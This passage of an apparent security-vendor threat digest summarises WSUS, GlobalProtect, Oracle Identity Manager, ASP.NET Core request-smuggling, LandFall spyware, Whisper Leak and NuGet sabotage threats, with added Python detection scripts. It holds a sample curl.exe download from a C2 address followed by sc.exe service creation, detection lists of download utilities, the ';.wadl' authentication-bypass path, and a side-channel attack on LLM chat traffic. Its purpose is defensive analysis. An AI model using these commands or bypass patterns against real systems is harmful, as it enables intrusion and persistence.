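The hunting items for this threat (curl.exe or certutil.exe followed by new services, the "Q-X64" identifier, built-in utilities spawned by w3wp.exe, and connections to the listed C2 addresses) can be expressed as one correlation pass over process-creation telemetry from the WSUS servers. The Python below is an added example, not F5's or any vendor's detection content: the pipe-delimited event format, the 30-minute correlation window, the host names, the command lines and the URL path are constructed, and only the parent process, utilities and indicators the report names are built in.

```python
"""Correlate process-creation telemetry for the WSUS post-exploitation chain in the report.

Rules, over Sysmon-style process events (Event ID 1) from WSUS servers:
  1. an IIS worker (w3wp.exe) spawning a shell or a download-capable utility;
  2. a command line referencing the report's C2 addresses;
  3. curl.exe/certutil.exe followed within a window by service/task creation on the same host;
  4. a service or task definition containing the report's "Q-X64" identifier.
"""
import ntpath
from datetime import datetime, timedelta

WEB_PARENTS = {"w3wp.exe"}  # IIS worker named in the report; add the WSUS service binary if your EDR shows it as parent
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
DOWNLOADERS = {"curl.exe", "certutil.exe"}
PERSISTENCE_TOOLS = {"sc.exe", "schtasks.exe"}
C2_INDICATORS = ("154.17.26.41", "163.61.102.245")
PERSISTENCE_TAG = "q-x64"
WINDOW = timedelta(minutes=30)  # assumption: tune to how quickly your baseline admin work chains these steps


def parse_event(line):
    """'<iso-ts> | host=H | parent=P | image=I | cmd=C' -> dict with a datetime (constructed format)."""
    ts, *fields = line.split(" | ")
    event = dict(f.split("=", 1) for f in fields)
    event["ts"] = datetime.fromisoformat(ts.replace("Z", "+00:00"))
    return event


def name(path):
    return ntpath.basename(path).lower()


def analyze(lines):
    """Return (host, rule, command_line) findings in chronological order."""
    events = sorted((parse_event(line) for line in lines), key=lambda e: e["ts"])
    findings = []
    last_download = {}  # host -> time of the most recent curl/certutil execution
    for e in events:
        parent, image, cmd = name(e["parent"]), name(e["image"]), e["cmd"].lower()
        if parent in WEB_PARENTS and image in SHELLS | DOWNLOADERS:
            findings.append((e["host"], "web-worker-spawns-shell-or-downloader", e["cmd"]))
        if any(ioc in cmd for ioc in C2_INDICATORS):
            findings.append((e["host"], "known-c2-address-in-command-line", e["cmd"]))
        if image in DOWNLOADERS:
            last_download[e["host"]] = e["ts"]
        if image in PERSISTENCE_TOOLS and "create" in cmd:
            seen = last_download.get(e["host"])
            if seen and e["ts"] - seen <= WINDOW:
                findings.append((e["host"], "download-then-service-or-task-creation", e["cmd"]))
            if PERSISTENCE_TAG in cmd:
                findings.append((e["host"], "persistence-name-matches-q-x64", e["cmd"]))
    return findings


# Constructed sample telemetry (not from the page). WSUS01 shows the reported chain;
# WSUS02 shows an admin download that is not followed by persistence and stays quiet.
SAMPLE_EVENTS = [
    "2025-11-06T09:12:01Z | host=WSUS01 | parent=C:\\Windows\\System32\\inetsrv\\w3wp.exe | image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe | cmd=powershell.exe -NoProfile -EncodedCommand [constructed]",
    "2025-11-06T09:12:05Z | host=WSUS01 | parent=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe | image=C:\\Windows\\System32\\curl.exe | cmd=curl.exe -s -o C:\\Windows\\Temp\\0C137A80.tmp http://154.17.26.41:8080/constructed-path",
    "2025-11-06T09:13:10Z | host=WSUS01 | parent=C:\\Windows\\System32\\cmd.exe | image=C:\\Windows\\System32\\sc.exe | cmd=sc.exe create Q-X64 binPath= C:\\Windows\\Temp\\ETDCtrlHelper.exe start= auto",
    "2025-11-06T10:02:44Z | host=WSUS02 | parent=C:\\Windows\\explorer.exe | image=C:\\Windows\\System32\\curl.exe | cmd=curl.exe -O https://updates.example.invalid/tools.zip",
    "2025-11-06T12:00:00Z | host=WSUS02 | parent=C:\\Windows\\System32\\services.exe | image=C:\\Windows\\System32\\svchost.exe | cmd=svchost.exe -k netsvcs",
]

if __name__ == "__main__":
    for host, rule, cmd in analyze(SAMPLE_EVENTS):
        print(f"{host}: {rule}: {cmd}")
```

The sequence rule is the one that separates this chain from routine administration: a lone curl.exe on a patch server is common, but a download followed minutes later by `sc.exe create` or `schtasks /create` on the same host is what the report's mitigation advice asks you to surface, and the Q-X64 name match is an exact-indicator check layered on top of it.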
Scan for any newly created scheduled tasks or system services on WSUS servers, paying special attention to any containing the identifier "Q-X64".
Compliance Best Practices
Review and re-architect network segmentation to ensure critical internal infrastructure like WSUS servers are not directly accessible from the internet and are isolated from general user subnets. Develop and deploy advanced EDR and SIEM detection rules to alert on anomalous use of built-in Windows utilities (e.g., `powershell.exe`, `certutil.exe`, `curl.exe`), especially when initiated by web server processes like w3wp.exe. Plan and implement an application control solution, such as Windows Defender Application Control (WDAC), on critical servers to restrict executable and script execution to only known, authorized software. Formalize and resource a vulnerability management program that prioritizes patching based on threat intelligence and mandates strict SLAs for critical vulnerabilities on high-value assets. Implement TLS/SSL inspection on network egress points to enable detection of malicious C2 communications hiding within encrypted web traffic.

GlobalProtect VPN Portals Probed with 2.3 Million Scan Sessions
Malicious scanning activity targeting Palo Alto Networks GlobalProtect VPN login portals increased 40 times within 24 hours, starting November 14, 2025, signaling a coordinated campaign. Real-time intelligence company GreyNoise observed 2.3 million scan sessions between November 14 and 19, specifically probing the `*/global-protect/login.esp` URI, which is the web endpoint for VPN user authentication. This surge follows previous spikes reported by GreyNoise in April and October 2025, with the current activity linked to earlier campaigns through recurring TCP/JA4t fingerprints and shared Autonomous System Numbers (ASNs), primarily AS200373 (3xK Tech GmbH) with IPs largely from Germany and Canada, and AS208885 (Noyobzoda Faridduni Saidilhom).
Login attempts are predominantly directed at the United States, Mexico, and Pakistan. GreyNoise highlights that these scanning spikes often precede the disclosure of new security flaws, a correlation particularly strong for Palo Alto Networks products, noting past incidents like the active exploitation of CVE-2025-0108 (chained with CVE-2025-0111 and CVE-2024-9474) in February and a data breach in September. Severity: Critical Sources https://cyberpress.org/2-3-million-attacks-hit-palo-alto-networks-globalprotect-vpn-portals/ https://www.bleepingcomputer.com/news/security/globalprotect-vpn-portals-probed-with-23-million-scan-sessions/ https://www.securitylab.ru/news/566393.php Threat Details and IOCs Malware: Alureon, CryptoDefense, CryptoLocker, CryptorBit, HowDecrypt, Locky, Lukitus, MS Juan, Odin, TDL-4, TDSS, Thor, Tidserv, Virtumonde, Vundo, Zepto CVEs: CVE-2024-9474, CVE-2025-0108, CVE-2025-0111, CVE-2025-0140, CVE-2025-0141, CVE-2025-2183 Technologies: Apple macOS, Linux, Microsoft Windows, Palo Alto Networks Threat Actors: ShinyHunters Attacker Countries: Canada, Germany Attacker URLs: /global-protect/login.esp Victim Industries: Automotive, Business Services, Education, Financial Services, Government, Healthcare, Industrial Control Systems, Information Technology, Manufacturing, Oil & Gas, Public Sector, Retail, Transportation, Utilities Victim Countries: Mexico, Pakistan, United States Mitigation Advice Verify that all Palo Alto Networks PAN-OS devices are patched against vulnerabilities CVE-2025-0108, CVE-2025-0111, and CVE-2024-9474. Query firewall, VPN, and web proxy logs for inbound connection attempts to the URI path containing '/global-protect/login.esp' to identify potential targeting. Implement firewall rules to block all inbound traffic from Autonomous System Numbers AS200373 and AS208885. 
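The log-query step above (find inbound requests to the `*/global-protect/login.esp` URI and notice when their volume jumps) can be scripted against ordinary access logs. The following Python helper is an added example, not code from the report or from GreyNoise: it parses common-log-format lines, keeps only requests whose path ends in the portal login URI, counts them per day and per source address, and flags any day whose count is at least `factor` times the mean of the earlier days. The 10x default factor, the minimum of three baseline days, and the sample log lines (built inline from documentation-range addresses) are assumptions made for the example.

```python
import re
from collections import Counter
from datetime import datetime
from typing import Dict, Iterable, List, Optional

# Common/combined log format: ip ident user [timestamp] "request" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)(?: [^"]*)?" (?P<status>\d{3})'
)
PORTAL_PATH = "/global-protect/login.esp"


def parse_log_line(line: str) -> Optional[dict]:
    """Return the fields of one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    # "14/Nov/2025:08:00:00 +0000" -> calendar date of the request
    rec["day"] = datetime.strptime(rec["ts"].split(":", 1)[0], "%d/%b/%Y").date()
    return rec


def is_portal_probe(rec: dict) -> bool:
    """Match the */global-protect/login.esp URI regardless of prefix or query string."""
    return rec["path"].split("?", 1)[0].endswith(PORTAL_PATH)


def portal_probes(lines: Iterable[str]) -> List[dict]:
    recs = (parse_log_line(line) for line in lines)
    return [r for r in recs if r is not None and is_portal_probe(r)]


def daily_portal_counts(lines: Iterable[str]) -> Dict[str, int]:
    """ISO date -> number of portal login requests seen that day (chronological)."""
    counts = Counter(r["day"].isoformat() for r in portal_probes(lines))
    return dict(sorted(counts.items()))


def source_counts(lines: Iterable[str]) -> Counter:
    """Portal requests per client IP, the input for IP/ASN blocking decisions."""
    return Counter(r["ip"] for r in portal_probes(lines))


def find_scan_surges(daily: Dict[str, int], factor: float = 10.0,
                     min_baseline_days: int = 3) -> List[str]:
    """Days whose count is >= factor x the mean of all earlier observed days.

    Days with no portal requests at all are absent from `daily`, so the baseline
    here covers observed days only; a SIEM baseline should fill such gaps with zeros.
    """
    surges, history = [], []
    for day in sorted(daily):
        count = daily[day]
        if len(history) >= min_baseline_days:
            baseline = sum(history) / len(history)
            if baseline > 0 and count >= factor * baseline:
                surges.append(day)
        history.append(count)
    return surges


def _constructed_log() -> List[str]:
    """Constructed sample: four quiet days, then one day of mass probing."""
    lines = []
    for day in ("10", "11", "12", "13"):
        for i in range(2):  # two ordinary logins per quiet day
            lines.append(f'198.51.100.{i + 1} - - [{day}/Nov/2025:08:0{i}:00 +0000] '
                         f'"GET /global-protect/login.esp HTTP/1.1" 200 512 "-" "Mozilla/5.0"')
    for i in range(80):  # 80 probes spread over 50 documentation-range addresses
        lines.append(f'203.0.113.{i % 50 + 1} - - [14/Nov/2025:{i % 24:02d}:15:00 +0000] '
                     f'"POST /global-protect/login.esp?user=x HTTP/1.1" 401 0 "-" "python-requests/2.31"')
    lines.append('198.51.100.9 - - [14/Nov/2025:09:00:00 +0000] '
                 '"GET /index.html HTTP/1.1" 200 100 "-" "Mozilla/5.0"')  # unrelated, must not count
    return lines


SAMPLE_LOG = _constructed_log()

if __name__ == "__main__":
    daily = daily_portal_counts(SAMPLE_LOG)
    print(daily)                                  # {'2025-11-10': 2, ..., '2025-11-14': 80}
    print(find_scan_surges(daily))                # ['2025-11-14']
    print(source_counts(SAMPLE_LOG).most_common(3))
```

Feed `daily_portal_counts` with real proxy or firewall logs over a longer window; the per-source counter is what you would join against ASN data before writing the block rules in the next step.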
Compliance Best Practices
Reconfigure network architecture to ensure the Palo Alto Networks GlobalProtect management interface is not exposed to the public internet and is only accessible from a trusted internal network segment. Configure SIEM or other log monitoring tools to establish a baseline for normal traffic to the GlobalProtect VPN portal and create alerts for significant deviations or anomalous increases in login attempts. Establish a comprehensive vulnerability management program that includes regular, authenticated scanning of all internet-facing infrastructure and defines service-level agreements (SLAs) for patching critical vulnerabilities.

Active Exploitation of Oracle Identity Manager CVE-2025-61757 Observed in September
Active exploitation attempts for CVE-2025-61757, an Oracle Identity Manager vulnerability, were observed between August 30th and September 9th, preceding Oracle's patch release on October 21st as part of their Critical Patch Update. This vulnerability, initially reported by Searchlight Cyber, enables authentication bypass and potential remote code execution by appending `;.wadl` to URLs, exemplified by `/iam/governance/applicationmanagement/templates;.wadl`. Logs indicate scans targeting `/iam/governance/applicationmanagement/api/v1/applications/groovyscriptstatus;.wadl` via POST requests containing a 556-byte payload. Multiple IP addresses (89.238.132.76, 185.245.82.81, 138.199.29.153) were involved, all using the consistent User Agent: `Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36`. These same IP addresses were also noted scanning for CVE-2025-4581 (Liferay Portal), bug bounty targets, and Log4j exploits.
Severity: Critical Sources https://buaq.net/go-377039.html https://isc.sans.edu/diary/rss/32506 https://www.securityweek.com/critical-oracle-identity-manager-flaw-possibly-exploited-as-zero-day/ Threat Details and IOCs Malware: Aisuru, BadAudio, Sturnus, TurboMirai CVEs: CVE-2025-4581, CVE-2025-61757 Technologies: Oracle Fusion Middleware, Oracle Identity Manager Attacker IPs: 138.199.29.153, 185.245.82.81, 89.238.132.76 Attacker URLs: /iam/governance/applicationmanagement/api/v1/applications/groovyscriptstatus;.wadl, /iam/governance/applicationmanagement/templates;.wadl, /o/portal-settings-authentication-opensso-web/com.liferay.portal.settings.web/test_opensso.jsp Victim Industries: Construction & Real Estate, Defense, Financial Services, Government, Hospitality, Information Security, Information Technology, Insurance, Internet & Cloud Services, Life Sciences, Managed Service Providers, Professional Services, Technology Hardware Victim Countries: United Kingdom, United States Mitigation Advice Immediately apply the October Critical Patch Update to all Oracle Identity Manager instances to patch CVE-2025-61757. Add the IP addresses 89.238.132.76, 185.245.82.81, and 138.199.29.153 to your firewall's blocklist. Create a rule in your WAF or IDS/IPS to detect and block any HTTP requests containing the string ';.wadl' in the URL path. Query web server logs and SIEM data for requests containing ';.wadl' in the URL or matching the User-Agent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36' to identify potential past or current malicious activity. Compliance Best Practices Establish or enhance a formal vulnerability management program that includes regular scanning, risk assessment, and a defined service-level agreement (SLA) for applying critical security patches. 
Review and harden Web Application Firewall (WAF) policies to block anomalous URL patterns, such as the use of semicolons for path parameter manipulation, to provide a generic defense against similar authentication bypass techniques. Enhance logging capabilities for critical web applications to capture and retain full HTTP request bodies, especially for POST requests, to improve future incident response and forensic analysis. Implement network segmentation to isolate internet-facing application servers, like Oracle Identity Manager, from internal corporate and database networks to limit the blast radius of a potential compromise.

HTTP Request Smuggling Using Chunk Extensions (CVE-2025-55315)
Executive Summary
HTTP request smuggling remains one of the nastier protocol-level surprises: it happens when different components in the HTTP chain disagree about where one request ends and the next begins. A recent, high-visibility ASP.NET Core disclosure brought one particular flavor of this problem into the spotlight: attackers abusing chunk extensions in chunked transfer encoding to craft ambiguous request boundaries. Microsoft assigned the vulnerability a very high severity (CVSS 9.9), its highest for ASP.NET Core to date. This article explains what chunk extensions are, why they can be abused for smuggling, how the recent ASP.NET Core issue fits into the bigger picture, and what defenders, implementers, and F5 customers should consider: particularly regarding HTTP normalization, compliance settings, and protection coverage across F5 Advanced WAF, NGINX App Protect, and Distributed Cloud.
Background: What Are Chunk Extensions?
In HTTP/1.1, chunked transfer encoding (via Transfer-Encoding: chunked) allows the body of a message to be sent as a sequence of chunks, each preceded by its size in hex, with the sequence terminated by a zero-length chunk. The specification also allows chunk extensions to be appended after the chunk length, e.g.:
In theory, chunk extensions were meant for metadata or transfer-layer options: for example, integrity checks or special directives. In practice, they are almost never used by legitimate clients or servers: many HTTP libraries ignore them or handle them inconsistently, and this inconsistency across intermediaries (proxies and servers) can be a source of request smuggling vulnerabilities. But if most servers and proxies ignore them, why would that even be an issue? Let's see.
Root Cause Analysis for CVE-2025-55315
The CVE description reads: "Inconsistent interpretation of HTTP requests ('HTTP request/response smuggling') in ASP.NET Core allows an authorized attacker to bypass a security feature over a network." Examining the GitHub commit reveals a relatively straightforward fix. In essence, the patch adjusts the chunk-extension parser to correctly handle \r\n line endings and to throw an error if either \r or \n appears unpaired. Additionally, a new flag was introduced for backward compatibility.
As expected, the vulnerable logic resides in the ParseExtension function. The new InsecureChunkedParsing flag preserves the legacy behavior, but it must be explicitly enabled, since that mode reflects the prior (and now considered insecure) implementation.
Previously, the parser looked only for the carriage return (\r) character to determine the end of a line. In the updated implementation, it checks for either a line feed (\n) or a carriage return (\r).
Next, we encounter the following condition:
The syntax may look a bit dense, but the logic is straightforward. In short, the old insecure behavior is retained when the InsecureChunkedParsing flag is enabled: the presence of \n is checked only after encountering \r. This is problematic because it allows a single \r or \n to be injected inside the chunk extension. In depth, the vulnerable condition, suffixSpan[1] == ByteLF, mirrors the old behavior: it verifies that the second character is \n, and we reach this part only if we previously saw \r. The new condition validates that the last two characters of the chunk extension are \r\n. Remember that in the new version, we reach this part when encountering either \r or \n. The fixed condition ensures that if an attacker tries to inject a single \r or \n somewhere within the chunk extension, the check will fail: the condition will evaluate to false.
When that happens, and if the backward-compatibility flag is not enabled, the parser throws an exception: Bad chunk extension. And what happened before the patch if the character following \r was not \n? The parser simply continued, making the following characters part of the chunk extension. That means a chunk extension could include line terminator characters.
The attack affecting unpatched ASP.NET Core applications is HTTP request smuggling via chunk extensions, a technique explained clearly and in depth in this article, which we'll briefly summarize in this post.
Request smuggling using chunk extensions variants
Before diving into the different chunk-extension smuggling variants, it's worth recalling the classic Content-Length / Transfer-Encoding (CL.TE and TE.CL) request smuggling techniques. These rely on discrepancies between how proxies and back-end servers interpret message boundaries: one trusts the Content-Length, the other trusts Transfer-Encoding, allowing attackers to sneak an extra request inside a single HTTP message. If you're not familiar with CL.TE, TE.CL and other variants, this article gives an excellent overview of how these desync vulnerabilities work in practice.
TERM.EXT (terminator - extension mismatch): The proxy treats a line terminator (usually \n) inside a chunk extension as the end of the chunk header, while the backend treats the same bytes as part of the extension.
EXT.TERM (extension - terminator mismatch): The proxy treats only the \r\n sequence as the end of the chunk header, while the backend treats a line terminator character inside the chunk extension as the end of the chunk header.
The ASP.NET Core issue
Previously, ASP.NET Core allowed lone \r or \n characters to appear within a chunk extension as long as the line ended with \r\n, placing it in the EXT category. If a proxy in front of it has TERM behavior (treating \n as line end), the parsing mismatch can enable request smuggling.
The figure shows an example malicious request that exploits this parsing mismatch. The proxy treats a lone \n as the end of the chunk extension. As a result, the bytes xx become the start of the body and 47 is interpreted as the size of the following chunk. If the proxy forwards the request unchanged (i.e., it does not strip the extension), those next chunks can effectively carry a second, smuggled request destined for an internal endpoint that the proxy would normally block.
When Kestrel (the ASP.NET Core backend) receives that same raw stream, it enforces a strict \r\n terminator for extensions. Because the backend searches specifically for the \r\n sequence, it parses the received stream differently, splitting the forwarded data into two requests (the extension content, 2;\nxx, is treated as a chunk header plus chunk body). The end result: a GET /admin request can reach the backend, even though the proxy would have blocked such a request had it observed it as a separate, external request.
F5 WAF Protections
NGINX App Protect and F5 Distributed Cloud
NGINX App Protect (NAP) and F5 Distributed Cloud (XC) normalize incoming HTTP requests and do not support chunk extensions. This means that any request arriving at NAP or XC with chunk extensions will have those extensions removed before being forwarded to the backend server. As a result, both NAP and XC are inherently protected against this class of chunk-extension smuggling attacks by design.
To illustrate this, let's revisit the example from the referenced article. NGINX, which treats a lone \n as a valid line terminator, falls under the TERM category. When this request is sent through NAP, it is parsed and normalized accordingly, effectively split into two separate requests:
What does this mean? NAP does not forward the request the same as it arrived.
It normalizes the message by stripping out any chunk extensions, replacing the Transfer-Encoding header with a Content-Length, and ensuring the body is parsed deterministically, leaving no room for ambiguity or smuggling. If a proxy precedes NAP and interprets the traffic as a single request, NAP will safely split and sanitize it. F5 Distributed Cloud (XC) does not treat a lone \n as a line terminator and also discards chunk extensions entirely.
Advanced WAF
Advanced WAF does not support chunk extensions. Requests containing a chunk header that is too long (more than 10 bytes) are treated as unparsable and trigger an HTTP compliance violation. To improve detection, we've released a new attack signature, "ASP.NET Core Request Smuggling - 200020232", which helps identify and block malicious attempts that rely on chunk extensions.
Conclusions
HTTP request smuggling via chunk extensions remains a very real threat, even in modern stacks. The disclosure of CVE-2025-55315 in the Kestrel web server underlines this: a seemingly small parsing difference (how \r, \n, and \r\n are treated in chunk extensions) can allow an attacker to conceal a second request within a legitimate one, enabling account takeover, code injection, SSRF, and many other severe attacks. This case offers a great reminder: don't assume that because "nobody uses chunk extensions" they cannot be weaponized. And of course, use HTTP/2. Its binary framing model eliminates chunked encoding altogether, removing the ambiguity that makes these attacks possible in HTTP/1.1.
F5 Threat Report - November 12th, 2025
New LandFall Spyware Exploited Samsung Zero-Day via WhatsApp Messages A previously unknown spyware, "LandFall," exploited a critical zero-day vulnerability (CVE-2025-21042) in Samsung's Android image processing library (`libimagecodec.quram.so`) to target select Samsung Galaxy users in the Middle East. Active since at least July 2024, the spyware was delivered via malicious .DNG raw images with appended .ZIP archives sent over WhatsApp, leveraging an out-of-bounds write flaw that allowed remote arbitrary code execution. The LandFall spyware, likely a commercial surveillance framework, targets Galaxy S22, S23, S24 series, Z Fold 4, and Z Flip 4 devices, enabling extensive data exfiltration including microphone and call recordings, location tracking, and access to photos, contacts, SMS, call logs, files, and browsing history. Its components include a loader (`b.so`) and a SELinux policy manipulator (`l.so`) for persistence and privilege escalation, and it can fingerprint devices using hardware and SIM IDs. While C2 infrastructure shows similarities to Stealth Falcon operations and component naming conventions resemble those of NSO Group and other vendors, a definitive attribution remains unconfirmed. Samsung patched the vulnerability in April 2025, and users are advised to apply security updates, disable automatic media downloading in messaging apps, and consider advanced protection features. 
Severity: Critical Sources https://buaq.net/go-374181.html https://cyberpress.org/landfall-android-malware/ https://meterpreter.org/landfall-spyware-zero-click-image-exploit-spied-on-samsung-phones-for-a-year/ https://www.bleepingcomputer.com/news/security/new-landfall-spyware-exploited-samsung-zero-day-via-whatsapp-messages/ https://www.hendryadrian.com/new-landfall-spyware-exploited-samsung-zero-day-via-whatsapp-messages/ https://www.newsbytesapp.com/news/science/landfall-android-spyware-targeted-samsung-galaxy-phones-for-a-year/story https://www.securityweek.com/landfall-android-spyware-targeted-samsung-phones-via-zero-day/ Threat Details and IOCs Malware: Deadglyph, Landfall, LandFall, LANDFALL CVEs: CVE-2025-21042, CVE-2025-21043, CVE-2025-43300, CVE-2025-55177 Technologies: Apple iOS, Google Android, Samsung Galaxy, Samsung One UI, WhatsApp Threat Actors: Cytrox, FruityArmor, Intellexa, LANDFALL, NSO, NSOGroup, StealthFalcon Attacker Countries: Israel, Spain, United Arab Emirates Attacker IPs: 192.36.57.56, 194.76.224.127, 45.155.250.158, 46.246.28.75, 91.132.92.35, 92.243.65.240 Attacker Domains: brightvideodesigns.com, healthyeatingontherun.com, hotelsitereview.com, projectmanagerskills.com Attacker URLs: https://brightvideodesigns.com/is/, https://healthyeatingontherun.com/is/, https://hotelsitereview.com/is/, https://projectmanagerskills.com/is/ Attacker Hashes: 211311468f3673f005031d5f77d4d716e80cbf3c1f0bb1f148f2200920513261, 2425f15eb542fca82892fd107ac19d63d4d112ddbfe698650f0c25acf6f8d78a, 29882a3c426273a7302e852aa77662e168b6d44dcebfca53757e29a9cdf02483, 384f073d3d51e0f2e1586b6050af62de886ff448735d963dfc026580096d81bd, 69cf56ac6f3888efa7a1306977f431fd1edb369a5fd4591ce37b72b7e01955ee, 9297888746158e38d320b05b27b0032b2cc29231be8990d87bc46f1e06456f93, a62a2400bf93ed84ebadf22b441924f904d3fcda7d1507ba309a4b1801d44495, b06dec10e8ad0005ebb9da24204c96cb2e297bd8d418bc1c8983d066c0997756, b45817ffb0355badcc89f2d7d48eecf00ebdf2b966ac986514f9d971f6c57d18, 
b975b499baa3119ac5c2b3379306d4e50b9610e9bba3e56de7dfd3927a96032d, c0f30c2a2d6f95b57128e78dc0b7180e69315057e62809de1926b75f86516b2e, d2fafc7100f33a11089e98b660a85bd479eab761b137cca83b1f6d19629dd3b0, ffeeb0356abb56c5084756a5ab0a39002832403bca5290bb6d794d14b642ffe2 Victim Industries: Digital Media, Government, Information Technology, Technology Hardware, Telecommunications Victim Countries: Iran, Iraq, Morocco, Saudi Arabia, South Korea, Turkey, United Arab Emirates Mitigation Advice Update all corporate-managed Samsung Galaxy S22, S23, S24, Z Fold 4, and Z Flip 4 devices to the April 2025 security patch level or a later version to remediate CVE-2025-21042. Issue a directive for all employees to disable automatic media downloading within their WhatsApp application settings on both corporate and personal devices used for work. Instruct users of corporate Android devices to enable the 'Advanced Protection' feature in their device's security settings for enhanced protection against novel spyware. Obtain the indicators of compromise (IOCs) for the six LandFall C2 servers from the Unit 42 report and add them to the network firewall and DNS blocklists. Compliance Best Practices Implement and enforce a Mobile Device Management (MDM) policy to mandate and automate the installation of critical OS security updates on all managed mobile devices within a 72-hour window of their release. Develop and deploy a mandatory, recurring security awareness training program that specifically addresses mobile-based social engineering, the risks of unsolicited attachments from unknown contacts, and safe practices for messaging apps like WhatsApp. Evaluate and deploy a Mobile Threat Defense (MTD) solution on corporate devices to actively monitor for and alert on suspicious activities indicative of spyware, such as permission escalation, use of recording hardware, and anomalous network connections. 
Establish and enforce a hardened security configuration baseline for all corporate mobile devices that enables high-security features, such as Android's 'Advanced Protection' or iOS's 'Lockdown Mode', by default.

Whisper Leak: A Novel Side-Channel Attack on Remote Language Models
A novel side-channel attack, termed "Whisper Leak," has been identified, enabling adversaries to infer language model conversation topics from encrypted network traffic by analyzing packet sizes and timings, despite Transport Layer Security (TLS) encryption. This attack exploits the token-by-token, streaming nature of large language model (LLM) responses, allowing network observers (e.g., internet service providers, local network attackers) to compromise user privacy, particularly for sensitive subjects like political dissent. Researchers demonstrated this by training a binary classifier on network traffic patterns for a specific topic ("legality of money laundering"), achieving over 98% accuracy (AUPRC). A simulated real-world scenario involving 10,000 conversations showed the attack could achieve 100% precision in identifying sensitive topics, even with low recall (5-50%), with effectiveness improving as more training data is collected. To mitigate this vulnerability, LLM providers like OpenAI and Azure have implemented "obfuscation" by adding random variable-length text to responses, while Mistral introduced a similar "p" parameter, significantly reducing attack effectiveness. Users can further protect their privacy by avoiding sensitive discussions on untrusted networks, utilizing VPN services, selecting providers with implemented mitigations, and opting for non-streaming models. The source code and a detailed technical report are publicly available.
Severity: Critical Sources https://gbhackers.com/whisper-based-attack/ https://securityonline.info/whisper-leak-attack-infers-encrypted-ai-chat-topics-with-98-accuracy/ https://thehackernews.com/2025/11/microsoft-uncovers-whisper-leak-attack.html https://www.microsoft.com/en-us/security/blog/2025/11/07/whisper-leak-a-novel-side-channel-cyberattack-on-remote-language-models/ Threat Details and IOCs Malware: LANDFALL, PrimeCache, PROMPTFLUX, SesameOp, Veaty, Whisper Technologies: Alibaba Cloud Large Language Models, DeepSeek Large Language Model, Google Large Language Models, Meta Large Language Models, Microsoft Azure, Microsoft Azure AI Services, Mistral AI Mistral, OpenAI, xAI, xAI Large Language Models, Zhipu AI Large Language Models Attacker URLs: http://github.com/yo-yo-yo-jbo/whisper_leak Victim Industries: Digital Media, Financial Services, Government, Healthcare, Health Care Technology, Information Technology, Legal Services, Media and Entertainment, Technology Hardware, Telecommunications Victim Countries: China, France, United States Mitigation Advice Require all employees to use the corporate VPN when accessing AI services from untrusted networks, such as public Wi-Fi, to add a layer of traffic encryption and obfuscation. Distribute a security advisory to all staff, prohibiting the use of public or corporate AI chatbots for processing sensitive, confidential, or proprietary business data. Audit all currently used third-party AI services to confirm they have implemented mitigations against traffic analysis attacks. Prioritize and approve the use of services that have deployed such protections. Instruct all teams using LLM APIs to disable 'streaming' mode in their applications and configurations where the feature is not essential for the user experience. 
Compliance Best Practices
Develop and implement a formal Acceptable Use Policy (AUP) for AI tools, defining approved platforms, data sensitivity classifications, and prohibited use cases to govern their safe adoption. Update the third-party risk management program to include specific security requirements for AI vendors, mandating they provide evidence of mitigations against side-channel attacks like traffic analysis. Initiate a research project to evaluate the cost, security benefits, and feasibility of deploying a private LLM for internal use cases involving sensitive company data.

Malicious NuGet Packages Plant Time Bomb Malware in Industrial Systems, Siemens S7 PLCs
Malicious NuGet packages, published by the user shanhai666 between 2023 and 2024, were discovered by Socket's researchers, containing destructive code designed to activate years in the future. Nine of the twelve packages, downloaded nearly 10,000 times, included payloads that were 99% benign to evade detection and build trust. Several packages targeted major database providers like SQL Server, PostgreSQL, and SQLite, with their malicious logic set to trigger on specific dates in 2027 and 2028. Upon activation, these packages introduce a 20 percent probability of terminating the host application process during database queries. The most critical package, Sharp7Extend, used typosquatting to mimic the legitimate Sharp7 library and targeted Siemens S7 Programmable Logic Controllers (PLCs) widely used in manufacturing. Unlike the database-targeting malware, Sharp7Extend activates immediately upon installation, though its malicious functions cease after June 6, 2028. It employs two mechanisms: a 20 percent chance of terminating the application during Siemens S7 communication operations, and after an initial 30-90 minute grace period, it causes 80 percent of critical commands to fail, potentially leading to safety system failures and data corruption in industrial settings.
All identified malicious packages have since been removed from NuGet, and organizations are advised to immediately audit their dependencies for these compromised packages. Severity: Critical Sources https://buaq.net/go-374596.html https://gbhackers.com/nuget-supply-chain/ https://securityonline.info/nuget-sabotage-time-delayed-logic-in-9-packages-risks-total-app-destruction-on-hardcoded-dates/ https://thehackernews.com/2025/11/hidden-logic-bombs-in-malware-laced.html https://www.bleepingcomputer.com/news/security/malicious-nuget-packages-drop-disruptive-time-bombs/ https://www.esecurityplanet.com/threats/malicious-nuget-packages-hide-time-delayed-sabotage-code/ https://www.hendryadrian.com/9-malicious-nuget-packages-deliver-time-delayed-destructive-payloads/ https://www.theregister.com/2025/11/07/cybercriminals_plant_destructive_time_bomb/ Threat Details and IOCs Malware: Sharp7Extend Technologies: Microsoft .NET Framework, Microsoft NuGet, Microsoft SQL Server, NuGet, PostgreSQL, Sharp7, Siemens S7, Siemens SIMATIC S7, SQLite Threat Actors: Shanhai666 Attacker Countries: China Attacker Domains: hendryadrian.com Victim Industries: Automotive, Chemical, Energy, Financial Services, Healthcare, Health Care Technology, Industrial Control Systems, Industrials, Information Technology, Logistics, Manufacturing, Retail Victim Countries: Germany Mitigation Advice Scan all .NET project dependencies to identify if any of the following malicious NuGet packages are present: Sharp7Extend, MyDbRepository, MCDbRepository, SqlDbRepository, SqlRepository, SqlUnicornCoreTest, SqlUnicornCore, SqlUnicorn.Core, or SqlLiteRepository. If any of the malicious NuGet packages are found on a system, immediately isolate that system from the network to begin incident response procedures. Configure your NuGet package manager sources to explicitly block any packages published by the user 'shanhai666'. 
